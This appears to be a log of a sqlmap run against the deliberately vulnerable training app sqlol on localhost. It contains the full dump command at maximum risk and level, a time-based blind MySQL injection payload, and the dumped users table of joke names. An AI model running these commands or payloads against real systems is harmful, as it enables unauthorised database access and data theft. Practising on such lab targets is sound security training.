=================================================================================
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=bool&error_level=none&show_query=on&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --dump --risk=3 --level=5

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y

19:42:47 lidz 19:50:21 (4. jautajumam) lidz 19:56:00 (parsniegts 5 min limits)
=================================================================================
sqlmap identified the following injection point(s) with a total of 5667 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=bool&error_level=none&show_query=on&inject_string=test' AND (SELECT 1803 FROM (SELECT(SLEEP(5)))EmRV)-- gshB&location=where_string&submit=Inject!
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12
Database: sqlol
Table: users
[4 entries]
+----+---------+-----------------------+
| id | isadmin | username              |
+----+---------+-----------------------+
| 1  | 1       | Herp Derper           |
| 2  | 1       | SlapdeBack LovedeFace |
| 3  | 0       | Wengdack Slobdegoob   |
| 4  | 0       | Chunk MacRunfast      |
+----+---------+-----------------------+

